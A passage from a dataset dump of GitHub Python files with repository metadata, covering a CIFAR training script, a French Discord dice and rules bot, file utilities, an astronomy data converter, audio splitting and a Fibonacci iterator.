rate')\r\nparser.add_argument('--scale',default=1.0, type=float, help='scale')\r\nparser.add_argument('-b', '--batchsize', default=128, type=int, metavar='N', help='mini-batch size (default: 64)')\r\nparser.add_argument('--c_tag','-c',default=1.0, type=float, help='c_tag')\r\nparser.add_argument('--input_size',default=32, type=int, help='input_size')\r\nparser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')\r\nparser.add_argument('--test', '-t', action='store_true', help='test')\r\nparser.add_argument('--data', '-d',default='cifar100',type=str, help='load_data')\r\nparser.add_argument('--save', '-s',default='mobilenetv2',type=str, help='save_model')\r\nparser.add_argument('--gpus', default='0', help='List of GPUs used for training - e.g 0,1,3')\r\nparser.add_argument('--lr_decay', type=float, default=0.1, help='Weight decay for learning rate.')\r\nparser.add_argument('--step', type=int, default=60, help='lr decrease after step')\r\nparser.add_argument('--type', default='float32', help='Type of tensor: float32, float16, float64. Default: float32')\r\nargs = parser.parse_args()\r\n\r\ndef train(model, epoch, checkPoint, savePoint, modelPath, curEpoch=0, best_acc = 0, useCuda=True,\r\n adjustLR = True, earlyStop=True, tolearnce=4):\r\n tolerance_cnt = 0\r\n tolerance_loss = 0\r\n step = 0\r\n if useCuda:\r\n model = model.cuda()\r\n ceriation = nn.CrossEntropyLoss()\r\n # ceriation=Weighted_LOSS()\r\n # optimizer = optim.Adam(net.parameters(), lr=args.lr)\r\n optimizer = optim.SGD(net.parameters(), lr=args.learning_rate, momentum=0.9, weight_decay=5e-4)\r\n\r\n for i in range(curEpoch, curEpoch+epoch):\r\n best_epoch=curEpoch\r\n model.train()\r\n # trainning\r\n sum_loss = 0\r\n # adjust_batchsize(args, 60, epoch=i)\r\n trainLoader, testLoader = load_data(args, batchSize=args.batchsize, device=6)\r\n if args.test:\r\n test(net,testLoader,True)\r\n else:\r\n for batch_idx, (x, target) in enumerate(trainLoader):\r\n optimizer.zero_grad()\r\n if adjustLR:\r\n adjust_learning_rate(args,optimizer,i)\r\n if useCuda:\r\n x, target = x.cuda(), target.cuda()\r\n x, target = Variable(x), Variable(target)\r\n out = model(x)\r\n loss = ceriation(out, target)\r\n sum_loss += loss.item()\r\n loss.backward()\r\n optimizer.step()\r\n step += 1\r\n writer.add_scalar('model/train_loss', loss.item(), (i + 1) * (batch_idx + 1))\r\n if (batch_idx + 1) % checkPoint == 0 or (batch_idx + 1) == len(trainLoader):\r\n print('==>>> epoch: {}, batch index: {}, step: {}, train loss: {:.6f}'.format\r\n (i, batch_idx + 1, step, sum_loss/(batch_idx+1)))\r\n\r\n acc = test(net,dataloade=testLoader,useCuda=True)\r\n # train_acc=test(net,trainLoader,useCuda=True)\r\n # writer.add_scalar('model/train_acc', train_acc, (i + 1))\r\n writer.add_scalar('model/test_acc', acc, (i + 1))\r\n\r\n # early stopping\r\n if earlyStop:\r\n if acc < best_acc:\r\n tolerance_cnt += 1\r\n else:\r\n best_acc = acc\r\n best_epoch=i\r\n tolerance_cnt = 0\r\n saveModel(model, best_epoch, best_acc, modelPath)\r\n\r\n if tolerance_cnt >= tolearnce:\r\n print(\"early stopping training....\")\r\n saveModel(model, best_epoch, best_acc, modelPath)\r\n return\r\n else:\r\n if best_acc < acc:\r\n best_epoch=i\r\n saveModel(model, best_epoch, acc, modelPath)\r\n best_acc = acc\r\n writer.close()\r\n # saveModel(model, epoch, best_acc, modelPath)\r\n\r\ndef test(model,dataloade,useCuda=True):\r\n correct_cnt, sum_loss = 0, 0\r\n total_cnt = 0\r\n model.eval()\r\n\r\n if useCuda:\r\n model=model.cuda()\r\n # start=time.time()\r\n for batch_idx, (x, target) in enumerate(dataloade):\r\n with torch.no_grad():\r\n x, target = Variable(x), Variable(target)\r\n # x, target = Variable(x, volatile=True), Variable(target, volatile=True)\r\n if useCuda:\r\n x, target = x.cuda(), target.cuda()\r\n out = model(x)\r\n\r\n _, pred_label = torch.max(out.data, 1)\r\n total_cnt += x.data.size()[0]\r\n correct_cnt += (pred_label == target.data).sum()\r\n correct_cnt = correct_cnt.item()\r\n # duration=time.time()-start\r\n # print('test time is :',duration)\r\n\r\n acc = (correct_cnt * 1.0 / float(total_cnt))\r\n print(\"acc:\", acc)\r\n return acc\r\n\r\ndef load_model(args):\r\n if args.data == 'cifar10':\r\n # net=VGG('VGG16')\r\n # net = ResNeXt29_2x64d()\r\n # net = MobileNet()\r\n # net = MobileNetV2(num_classes=10,scale=1.6)\r\n # net=ResNet50(num_classes=100)\r\n # net = DPN92()\r\n # net = ShuffleNetG2(num_classes=10)\r\n # net = SENet18()\r\n # net=ResNet101(num_classes=10)\r\n # net = NewModel24(num_classes=10)\r\n # net=ResNeXt29_2x64d()\r\n # net=inverse(num_classes=10,input_size=args.input_size)\r\n # net=pre_t(num_classes=10,input_size=args.input_size)\r\n net=pre_inverse(num_classes=10,input_size=args.input_size)\r\n # net=PreActResNet34()\r\n # net=DenseNet121(num_classes=10)\r\n elif args.data == 'cifar100':\r\n # net = VGG('VGG16')\r\n # net = ResNeXt29_2x64d()\r\n net = MobileNet(num_classes=100)\r\n # net = MobileNetV2(num_classes=100,scale=1.0)\r\n # net=SENet18(num_classes=100)\r\n # net=Inverse_M(num_classes=100,scale=1.0)\r\n # net = DPN92()\r\n # net = ShuffleNetG2(num_classes=100)\r\n # net = SENet18()\r\n # net=inverse(num_classes=100,input_size=args.input_size)\r\n # net = pre_t(num_classes=100, input_size=args.input_size)\r\n # net = pre_inverse(num_classes=100,input_size=args.input_size)\r\n # net = ResNet34(num_classes=100)\r\n # net = NewModel24(num_classes=100)\r\n # net = DenseNet121(num_classes=100)\r\n # net=SINet(num_classes=100,add=False)\r\n return net\r\n\r\nif __name__ == '__main__':\r\n summary_dir = './result/log/' + args.save + '/'\r\n if not os.path.exists(summary_dir):\r\n os.makedirs(summary_dir)\r\n\r\n print('log dir: ' + summary_dir)\r\n writer = SummaryWriter(log_dir=summary_dir)\r\n\r\n # Model\r\n save_path_root=\"/home/yaoyang/result/\"\r\n # log_sum_dir=save_path_root+args.save_training_log+'.json'\r\n use_cuda = torch.cuda.is_available()\r\n\r\n model_path=save_path_root+args.save\r\n\r\n print('model_save_path is:',model_path)\r\n\r\n # net=load_model(args)\r\n net=M2(1.0,32,6,3,100)\r\n if args.gpus is not None:\r\n args.gpus = [int(i) for i in args.gpus.split(',')]\r\n cudnn.benchmark = True\r\n\r\n\r\n if args.resume:\r\n print('==> loading model..')\r\n # net = torch.nn.DataParallel(net, device_ids=range(torch.cuda.device_count()))\r\n net = torch.nn.DataParallel(net, device_ids=args.gpus)\r\n net,best_acc,curEpoch=loadModel(model_path,net)\r\n else:\r\n best_acc=0\r\n curEpoch=0\r\n print('==> Building model..')\r\n # net = torch.nn.DataParallel(net, device_ids=range(torch.cuda.device_count()))\r\n net = torch.nn.DataParallel(net, device_ids=args.gpus)\r\n\r\n print('current epoch: ', curEpoch)\r\n print('current best acc: ', best_acc)\r\n use_cuda=torch.cuda.is_available()\r\n train(net,epoch=200,checkPoint=10,savePoint=500,modelPath=model_path,\r\n useCuda=use_cuda,best_acc=best_acc,adjustLR=True,curEpoch=curEpoch,earlyStop=False)\r\n\r\n","repo_name":"source-code-share/SINet","sub_path":"codes/cifar_train.py","file_name":"cifar_train.py","file_ext":"py","file_size_in_byte":8249,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"23576742880","text":"import random\r\nimport re\r\n\r\nfrom discord.ext import commands\r\n\r\n\r\nbot = commands.Bot(command_prefix='/')\r\n\r\n\r\n@bot.command(description=\"Dis coucou au gentil robot!\",\r\n brief=\"Politesse avant tout!\",\r\n pass_context=True)\r\nasync def hello(context):\r\n possible_responses = [\r\n \"おはよう\",\r\n \"Hello\",\r\n \"Non. \",\r\n ]\r\n await bot.say(random.choice(possible_responses) + context.message.author.mention)\r\n\r\n\r\n@bot.command(description=\"Je te le dis, tu vas le regretter, ne fais pas ça.\",\r\n brief=\"Ne fais pas ça.\")\r\nasync def non():\r\n videos_infernales = [\r\n \"https://www.youtube.com/watch?v=juqyzgnbspY\",\r\n \"https://www.youtube.com/watch?v=InQC3MvDZM4\",\r\n ]\r\n await bot.say(\"Tu l'auras voulu :) \" + random.choice(videos_infernales))\r\n\r\n\r\n# Descriptions des admins\r\n\r\n@bot.command(name=\"Silonix\",\r\n description=\"Permet d'obtenir des informations sur notre très cher Silonix.\",\r\n brief=\"Détails sur Silonix\")\r\nasync def silonix():\r\n await bot.say(\"Fondateur de Elydra et ancien administrateur de Malm, Silonix est un loriste investi, \"\r\n \"un MJ démoniaque, mais aussi une personne fort sympathique, malgré les airs un peu hautains \"\r\n \"qu'il se donne par moments. Il est responsable des Wizel, et adore les anguilles. :)\")\r\n\r\n\r\n@bot.command(name=\"Styx\",\r\n description=\"Permet d'obtendir des informations sur notre très cher Styx.\",\r\n brief=\"Détails sur Styx\")\r\nasync def styx():\r\n await bot.say(\"Fondateur de Elydra et ancien fondateur de Malm, Styx est un loriste sérieux, un MJ assidu, \"\r\n \"mais aussi une personne fort sympathique, malgré les airs un peu froids et distants qu'il se \"\r\n \"donne par moments. Il est responsable des Widriens, et adore les cailloux. :)\")\r\n\r\n\r\n@bot.command(name=\"Luxia\",\r\n description=\"Permet d'obtenir des informations sur notre très chère Luxia.\",\r\n brief=\"Détails sur Luxia\")\r\nasync def luxia():\r\n await bot.say(\"Fondatrice de Elydra et ancienne fondatrice de Malm, Luxia est une loriste désastreuse, une MJ \"\r\n \"catastrophique, mais aussi une personne fort sympathique [parfois], malgré les airs un peu \"\r\n \"excentriques [de psychopathe] qu'elle se donne par moments. Elle n'est responsable de rien\"\r\n \" [trop dangereux], mais surveille le règlement, ce bot et les parties de Cards Against \"\r\n \"Humanity. Elle sert aussi de psychologue à ses heures perdues, et adore les pots de fleurs \"\r\n \"et les tomates. Personne n'est certain qu'elle soit réellement de sexe féminin.\")\r\n\r\n\r\n# commandes citation règlement\r\n\r\n\r\n@bot.command(name=\"règle1\",\r\n description=\"Cite la règle 1\",\r\n brief=\"Cite la règle 1\")\r\nasync def rule1():\r\n await bot.say(\"**Tous propos insultants, rabaissants, diffamatoires, racistes, homophobes, discriminants à \"\r\n \"l’encontre de qui que ce soit sont formellement interdits.** Même à titre humoristiques.\")\r\n\r\n\r\n@bot.command(name=\"règle2\",\r\n description=\"Cite la règle 2\",\r\n brief=\"Cite la règle 2\")\r\nasync def rule2():\r\n await bot.say(\"**Le spam, le contenu à caractère pornographique ou NSFW, ainsi que les publicités pour d’autres\"\r\n \" serveurs sont prohibés.** Vous n’aurez qu’à faire tout ce qui concerne ce qui vient d’être \"\r\n \"énoncé en privé.\")\r\n\r\n\r\n@bot.command(name=\"règle3\",\r\n description=\"Cite la règle 3\",\r\n brief=\"Cite la règle 3\")\r\nasync def rule3():\r\n await bot.say(\"**Les personnages de RP doivent être équilibrés, mortels, pas intouchables, respecter les meurs \"\r\n \"et les règles des clans auxquels ils appartiennent.** Pour que le jeu soit agréable pour chacun, \"\r\n \"chaque personnage doit rester dans un champ “possible” et raisonnable par rapport au lore.\")\r\n\r\n\r\n@bot.command(name=\"règle4\",\r\n description=\"Cite la règle 4\",\r\n brief=\"Cite la règle 4\")\r\nasync def rule4():\r\n await bot.say(\"**En rp, les actions d’un personnage doivent être logiques, plausibles et cohérentes avec l’\"\r\n \"univers.** De sorte à garder une ambiance agréable pour ceux qui jouent avec vous. **En cas de \"\r\n \"besoin, n’hésitez pas à utiliser les dés pour déterminer l’issue d’une action résultant de la \"\r\n \"chance.**\")\r\n\r\n\r\n@bot.command(name=\"règle5\",\r\n description=\"Cite la règle 5\",\r\n brief=\"Cite la règle 5\")\r\nasync def rule5():\r\n await bot.say(\"**En rp, il est interdit de jouer le personnage d’un autre à sa place** (à moins que celui-ci en \"\r\n \"ait donné l’autorisation). Vous ne faites agir que votre propre personnage.\")\r\n\r\n\r\n@bot.command(name=\"règle6\",\r\n description=\"Cite la règle 6\",\r\n brief=\"Cite la règle 6\")\r\nasync def rule6():\r\n await bot.say(\"**Votre pseudo devra être le prénom accompagné, si vous le désirez, du nom de votre personnage.**\"\r\n \" Pour rappel, vous pouvez changer votre surnom sur ce serveur en appuyant sur le bouton “Eydra” \"\r\n \"puis “Changer de pseudo”. De plus, **il est obligatoire de remplir sa fiche entièrement selon le \"\r\n \"modèle épinglé dans #présentations pour pouvoir être validé.**\")\r\n\r\n\r\n@bot.command(name=\"règle7\",\r\n description=\"Cite la règle 7\",\r\n brief=\"Cite la règle 7\")\r\nasync def rule7():\r\n await bot.say(\"**Il est interdit de tuer le personnage de quelqu’un d’autre.** Cependant, il est quand même \"\r\n \"possible de mourir, durant des évent ou encore si vous repoussez trop les limites de votre \"\r\n \"personnage, suite à une décision du staff, accompagnée de l’action de MJs.\")\r\n\r\n\r\n@bot.command(name=\"règle8\",\r\n description=\"Cite la règle 8\",\r\n brief=\"Cite la règle 8\")\r\nasync def rule8():\r\n await bot.say(\"**Les messages HRP entre parenthèses sont autorisés dans le RP** mais doivent rester \"\r\n \"exceptionnels et être supprimés après coup. De plus, **il est interdit d’utiliser un langage \"\r\n \"abrégé ou des smileys dans le rp.** Essayez de conserver une orthographe correcte, et démarquez \"\r\n \"les paroles des actions de votre personnage en mettant par exemple les paroles entre guillemets, \"\r\n \"et le reste en Italique. (Rappel, vous pouvez mettre un texte en Italique en mettant des étoiles \"\r\n \"ou des underscores au début et à la fin de votre texte, ``*comme ceci*`` ou ``_comme cela_``.)\")\r\n\r\n\r\n@bot.command(name=\"règle9\",\r\n description=\"Cite la règle 9\",\r\n brief=\"Cite la règle 9\")\r\nasync def rule9():\r\n await bot.say(\"Enfin, **vous êtes autorisés à avoir autant de comptes que vous le souhaitez**, pour autant que \"\r\n \"vous fassiez de votre mieux pour les garder actifs un minimum. Refondre ses personnages est aussi\"\r\n \" possible sans conditions.\")\r\n\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print('Logged in as')\r\n print(bot.user.name)\r\n print(bot.user.id)\r\n print('------')\r\n\r\n\r\n@bot.event\r\nasync def on_command_error(error, ctx):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await bot.send_message(ctx.message.channel, \"Utilisation: `.r #d#` e.g. `.r 1d20`\\nUtilise .help pour plus \"\r\n \"d'informations.\")\r\n\r\n\r\n@bot.command(pass_context=True)\r\nasync def r(ctx, roll: str):\r\n \"\"\"Lance un dé utilisant le format #d# .\r\n e.g .r 3d6\"\"\"\r\n\r\n resultTotal = 0\r\n resultString = ''\r\n try:\r\n try:\r\n numDice = roll.split('d')[0]\r\n diceVal = roll.split('d')[1]\r\n except Exception as e:\r\n print(e)\r\n await bot.say(\"La commande doit être au format #d# %s.\" % ctx.message.author.name)\r\n return\r\n\r\n if int(numDice) > 500:\r\n await bot.say(\"Je ne peux pas lancer autant de dés %s.\" % ctx.message.author.name)\r\n return\r\n\r\n bot.type()\r\n await bot.say(\"En train de rouler %s d%s pour %s\" % (numDice, diceVal, ctx.message.author.mention))\r\n rolls, limit = map(int, roll.split('d'))\r\n\r\n for r in range(rolls):\r\n number = random.randint(1, limit)\r\n resultTotal = resultTotal + number\r\n\r\n if resultString == '':\r\n resultString += str(number)\r\n else:\r\n resultString += ', ' + str(number)\r\n\r\n if numDice == '1':\r\n await bot.say(\"Dé de \" + ctx.message.author.mention + \" :game_die:\\n**Résultat:** \" + resultString)\r\n else:\r\n await bot.say(\r\n \"Dé de \" + ctx.message.author.mention + \" :game_die:\\n**Résultat:** \" + resultString +\r\n \"\\n**Total:** \" + str(resultTotal))\r\n\r\n except Exception as e:\r\n print(e)\r\n return\r\n\r\n\r\n@bot.command(pass_context=True)\r\nasync def rt(ctx, roll: str):\r\n \"\"\"Lance un dé utilisant le format #d#s# avec un comparateur de réussite, où s est le comparateur de type (< = >).\r\n e.g .r 3d10<55\"\"\"\r\n\r\n numberSuccesses = 0\r\n resultString = ''\r\n\r\n try:\r\n valueList = re.split(\"(\\d+)\", roll)\r\n valueList = list(filter(None, valueList))\r\n\r\n diceCount = int(valueList[0])\r\n diceValue = int(valueList[2])\r\n thresholdSign = valueList[3]\r\n successThreshold = int(valueList[4])\r\n\r\n except Exception as e:\r\n print(e)\r\n await bot.say(\"La commande doit être au format #d#t# %s.\" % ctx.message.author.mention)\r\n return\r\n\r\n if int(diceCount) > 500:\r\n await bot.say(\"Je ne peux pas lancer autant de dés %s.\" % ctx.message.author.mention)\r\n return\r\n\r\n bot.type()\r\n await bot.say(\"En train de rouler %s d%s pour %s avec une réussite %s %s\" % (\r\n diceCount, diceValue, ctx.message.author.name, thresholdSign, successThreshold))\r\n\r\n try:\r\n for r in range(0, diceCount):\r\n\r\n number = random.randint(1, diceValue)\r\n isRollSuccess = False\r\n\r\n if thresholdSign == '<':\r\n if number < successThreshold:\r\n numberSuccesses += 1\r\n isRollSuccess = True\r\n\r\n elif thresholdSign == '=':\r\n if number == successThreshold:\r\n numberSuccesses += 1\r\n isRollSuccess = True\r\n\r\n else: # >\r\n if number > successThreshold:\r\n numberSuccesses += 1\r\n isRollSuccess = True\r\n\r\n if resultString == '':\r\n if isRollSuccess:\r\n resultString += '**' + str(number) + '**'\r\n else:\r\n resultString += str(number)\r\n else:\r\n if isRollSuccess:\r\n resultString += ', ' + '**' + str(number) + '**'\r\n else:\r\n resultString += ', ' + str(number)\r\n\r\n isRollSuccess = False\r\n\r\n if diceCount == 1:\r\n if numberSuccesses == 0:\r\n await bot.say(\r\n \"Dé de \" + ctx.message.author.mention + \" :game_die:\\n**Résultat:** \" + resultString +\r\n \"\\n**Réussite:** :x:\")\r\n else:\r\n await bot.say(\r\n \"Dé de \" + ctx.message.author.mention + \" :game_die:\\n**Résultat:** \" + resultString +\r\n \"\\n**Réussite:** :white_check_mark:\")\r\n else:\r\n await bot.say(\r\n \"Dé de \" + ctx.message.author.mention + \" :game_die:\\n**Résultat:** \" + resultString +\r\n \"\\n**Réussite:** \" + str(numberSuccesses))\r\n except Exception as e:\r\n print(e)\r\n return\r\n\r\n\r\nbot.run(token)\r\n","repo_name":"LuxiaFlowerpot/thishasnointerest","sub_path":"Anguille-test.py","file_name":"Anguille-test.py","file_ext":"py","file_size_in_byte":12332,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14849853036","text":"import errno\nimport os\nfrom os import path, listdir\nfrom os.path import isfile, join, isdir\nimport subprocess as sp\n\ntry:\n from subprocess import DEVNULL \nexcept ImportError:\n DEVNULL = open(os.devnull, 'w')\n\n\n#create as many subdirectories that don't already exists\ndef mkdir_p(new_path):\n try:\n os.makedirs(new_path)\n except OSError as exc: \n if exc.errno == errno.EEXIST and path.isdir(new_path):\n pass\n else:\n raise\n\n#for file in get_files_of_type(root_dir, extention): ...\ndef get_files_of_type(root_dir, extention):\n for root, dirs, files in os.walk(root_dir):\n for f in files:\n if f.endswith(extention):\n yield os.path.join(root, f)\n\ndef getDirsIn(dirName, joinDir=True):\n try:\n onlyDirs = [d for d in listdir(dirName) if isdir(join(dirName, d))]\n if joinDir:\n return [join(dirName, d) for d in onlyDirs]\n else:\n return onlyDirs\n except BaseException:\n raise\n\ndef write_lines(lines, file_name):\n with open(file_name, 'w') as out_file:\n text = '\\n'.join(lines)\n out_file.write(text)\n\ndef format_json(json_path):\n with open(json_path) as data:\n d = json.load(data)\n json_f = open(json_path, 'w')\n json.dump(d, json_f, indent = 4, sort_keys = True)\n\ndef copy(src, dst):\n if not path.exists(dst):\n mkdir_p(dst)\n\n cp_cmd = \"cp {} {}\".format(src, dst)\n run_p(cp_cmd)\n\ndef run_p(command):\n command_list = command.split()\n try:\n p = sp.Popen(command_list, stderr = DEVNULL, stdout = DEVNULL, stdin = DEVNULL)\n out, err = p.communicate()\n if err:\n print(err)\n finally:\n if p:\n p.kill()\n\ndef get_imediate_dir(file_path):\n return path.basename(path.normpath(file_path))\n","repo_name":"mlanden/Useful-Code-Snippits","sub_path":"utilities/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24803778310","text":"from astropy.time import Time\nfrom astropy.table import Table\nfrom astropy.io import ascii\n\n\ndef skyportal_input_to_nmma(data_dict):\n\n # this example analysis service expects the photometry to be in\n # a csv file (at data_dict[\"inputs\"][\"photometry\"]) with the following columns\n # - filter: the name of the bandpass\n # - mjd: the modified Julian date of the observation\n # - magsys: the mag system (e.g. ab) of the observations\n # - limiting_mag:\n # - magerr:\n # - flux: the flux of the observation\n # the following code transforms these inputs from SkyPortal\n # to the format expected by nmma.\n # And makes sure thate the times is in correct format\n # We need to convert the time format mjd to the format expected by of session so in jd\n # the utils.py file need jd format which will be convert in isot.\n\n rez = {\"status\": \"failure\", \"message\": \"\", \"analysis\": {}}\n\n try:\n\n data = Table.read(data_dict, format=\"ascii.csv\")\n\n # convert time in julien day format (jd)\n # check if time is really in mjd format\n # if data[\"mjd\"] is in mjd, time < 0\n\n for time_format in [\"mjd\", \"jd\"]:\n if (time_format == \"mjd\") & (time_format in data.columns):\n try:\n time = Time(data[\"mjd\"][0], format=\"jd\").mjd\n\n except KeyError:\n print(f\" Sorry the name: {time_format} does not exits\")\n\n else:\n if time < 0:\n data[\"mjd\"] = Time(data[\"mjd\"], format=\"mjd\").jd\n\n data.rename_column(\"mjd\", \"jd\")\n\n # check if the time is in jd format\n # if data[\"jd\"] is in jd, time < 0\n elif (time_format == \"jd\") & (time_format in data.columns):\n try:\n time = Time(data[\"jd\"][0], format=\"jd\").mjd\n except KeyError:\n print(f\" Sorry the name: {time_format} does not exits\")\n\n else:\n if time < 0:\n data[\"jd\"] = Time(data[\"jd\"], format=\"mjd\").jd\n\n # Rename Columns from skyportal to nmma format\n # skyportal_col = [\"magerr\", \"limiting_mag\", \"instrument_name\"]\n\n for col in data.columns:\n if col == \"magerr\":\n data.rename_column(\"magerr\", \"mag_unc\")\n\n elif col == \"limmiting_mag\":\n data.rename_column(\"limiting_mag\", \"limmag\")\n\n elif col == \"instrument_name\":\n data.rename_column(\"instrument_name\", \"programid\")\n\n switcher = {1: \"ztfg\", 2: \"ztfr\", 3: \"ztfi\"}\n\n for filt in switcher.values():\n index = np.where(data[\"filter\"] == filt)\n\n if filt == \"ztfg\":\n data[\"filter\"][index] = \"g\"\n elif filt == \"ztfr\":\n data[\"filter\"][index] = \"r\"\n elif filt == \"ztfi\":\n data[\"filter\"][index] = \"i\"\n else:\n data[\"filter\"][index] = filt\n\n data = data.filled()\n data.sort(\"jd\")\n\n if \"obj_id\" in data.columns:\n cand_name = data[\"obj_id\"]\n\n else:\n cand_name = \"ztf_filename\"\n\n data = data.filled()\n data.sort(\"jd\")\n\n except Exception as e:\n rez.update(\n {\n \"status\": \"failure\",\n \"message\": f\"input data is not in the expected format {e}\",\n }\n )\n return rez\n\n return data\n","repo_name":"weizmannk/nmma-skyportal","sub_path":"utils/nmma_process.py","file_name":"nmma_process.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9420962136","text":"# coding=utf-8\nfrom django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n # Toutes les urls en app/ gérées par l'application elle même\n url(r'^app/', include('app.urls', namespace=\"app\")),\n)\n","repo_name":"MilkShakeTeam/Frigo","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40292219965","text":"import librosa as li\nimport os\nimport soundfile as sf\nimport numpy as np\n\nfolders = os.listdir(\"./samples\")\n\nt = 8\n\nfor folder in folders:\n files = os.listdir(\"./samples/\" + folder)\n j = 0\n for file in files:\n print(file)\n audio, sr = li.load(os.path.join(\"./samples/\" + folder, file),\n sr=44100)\n\n nb_samples = t * sr\n split = len(audio) // nb_samples + 1\n\n audios = np.array_split(audio, split)\n\n for audio in audios:\n sf.write(os.path.join(\"./samples/\" + folder,\n str(j) + \".wav\"),\n audio,\n samplerate=44100)\n j += 1\n","repo_name":"dgenova/RAVEberry-server","sub_path":"audio_crop.py","file_name":"audio_crop.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"22573388957","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport time\nimport tensorflow as tf\nimport numpy as np\nimport sklearn\nfrom sklearn import metrics\nfrom Hypothesis_train import Hypo_Gen\ntf.compat.v1.disable_eager_execution()\n\n# os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\n\n# Set random seed\nseed = 123\nnp.random.seed(seed)\ntf.compat.v1.set_random_seed(seed)\n\n# Settings\nflags = tf.compat.v1.app.flags\nFLAGS = flags.FLAGS\ntf.compat.v1.app.flags.DEFINE_boolean('log_device_placement', False,\n\t\t\t\t\t\t\t\"\"\"Whether to log device placement.\"\"\")\n#core params..\nflags.DEFINE_string('model', 'graphsage_mean', 'model names. See README for possible values.') \nflags.DEFINE_float('learning_rate', 0.0005, 'initial learning rate.')\nflags.DEFINE_string(\"model_size\", \"small\", \"Can be big or small; model specific def'ns\")\nflags.DEFINE_string(\"key_type\", \"all_keys\", \"dataset category to use\")\nflags.DEFINE_string(\"data_folder\", \"corona_data\", \"dataset to use\")\nflags.DEFINE_string(\"test_type\",\"full\", \"method for evaluation [full,eval]\")\nflags.DEFINE_string(\"risk_type\", \"upu\", \"risk to use\")\n\n# left to default values in main experiments \nflags.DEFINE_integer('epochs', 3, 'number of epochs to train.')\nflags.DEFINE_float('dropout', 0.0,'dropout rate (1 - keep probability).')\nflags.DEFINE_float('weight_decay', 0.0, 'weight for l2 loss on embedding matrix.')\nflags.DEFINE_integer('max_degree', 128, 'maximum node degree.')\nflags.DEFINE_integer('samples_1', 20, 'number of samples in layer 1')\nflags.DEFINE_integer('samples_2', 10, 'number of samples in layer 2')\nflags.DEFINE_integer('samples_3', 0,'number of users samples in layer 3. (Only for mean model)')\nflags.DEFINE_integer('dim_1', 128, 'Size of output dim (final is 2x this, if using concat)')\nflags.DEFINE_integer('dim_2', 128, 'Size of output dim (final is 2x this, if using concat)')\nflags.DEFINE_boolean('random_context', True, 'Whether to use random context or direct edges')\nflags.DEFINE_integer('batch_size', 512, 'minibatch size.')\nflags.DEFINE_boolean('sigmoid', True, 'whether to use sigmoid loss')\nflags.DEFINE_integer('identity_dim', 0, 'Set to positive value to use identity embedding features of that dimension. Default 0.')\n\n#logging, saving, validation settings etc.\nflags.DEFINE_string('base_log_dir', '.', 'base directory for logging and saving embeddings')\nflags.DEFINE_integer('validate_iter', 5000, \"how often to run a validation minibatch.\")\nflags.DEFINE_integer('validate_batch_size', 256, \"how many nodes per validation sample.\")\n# flags.DEFINE_integer('gpu', 1, \"which gpu to use.\")\nflags.DEFINE_integer('print_every', 40, \"How often to print training info.\")\nflags.DEFINE_integer('max_total_steps', 10**10, \"Maximum total number of iterations\")\n\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=str(FLAGS.gpu)\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\n\n\n\n\n\ndef main(argv=None):\n\tacc, f1, rec, conf_mat = 0, 0, 0, np.array([[0,1],[0,0]])\n\tcurrent_year = 1959\n\tverbose = True\n\ttf.compat.v1.reset_default_graph()\n\thpg = Hypo_Gen(current_year, verbose)\n\thpg.train_test(FLAGS, verbose)\n\nif __name__ == '__main__':\n\ttf.compat.v1.app.run()\n\tmain()\n\n\n\n\n\n\n","repo_name":"Uchman21/TRP","sub_path":"supervised_train.py","file_name":"supervised_train.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"33650991946","text":"import itertools\nN = int(input())\narr = [list(map(int,input().split())) for _ in range(N)]\nnum = [i for i in range(N)]\npublic = list(itertools.combinations(num,(N//2)))\nlength = len(public)\nmaximun = 1000000\nfor k in range(length//2) :\n num1=num2=0\n public2 = itertools.permutations(public[k],2)\n public3 = itertools.permutations(public[length-k-1],2)\n for j in public2 :\n num1 += arr[j[0]][j[1]]\n\n for t in public3 :\n num2 += arr[t[0]][t[1]]\n\n maximun = min(maximun,abs(num1-num2))\n\nprint(maximun)","repo_name":"joun008/20185182_BAEKJOON","sub_path":"src/sw_1_6/Q.06.py","file_name":"Q.06.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29127038795","text":"class Fib_eternal:\n \"\"\"По объектам этого класса можно итерироваться и получать 6 чисел Фибоначчи\"\"\"\n\n class _Fib_eternal_iter:\n \"\"\"Внутренний класс — итератор\"\"\"\n def __init__(self):\n self.i = 0\n self.fib1 = 1\n self.fib2 = 1\n\n def __next__(self):\n if self.i < 2:\n self.i += 1\n return self.fib1\n\n self.i += 1\n fib3 = self.fib1 + self.fib2\n self.fib1 = self.fib2\n self.fib2 = fib3\n return fib3\n\n def __iter__(self):\n \"\"\"Создать и вернуть итератор\"\"\"\n return Fib_eternal._Fib_eternal_iter()\n\n\nf6 = Fib_eternal()\n\nfor f in f6:\n print(f)\n","repo_name":"TheSimBiONe/SPBAU_Best_python_course","sub_path":"Eternal_Fib.py","file_name":"Eternal_Fib.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45334401776","text":"import 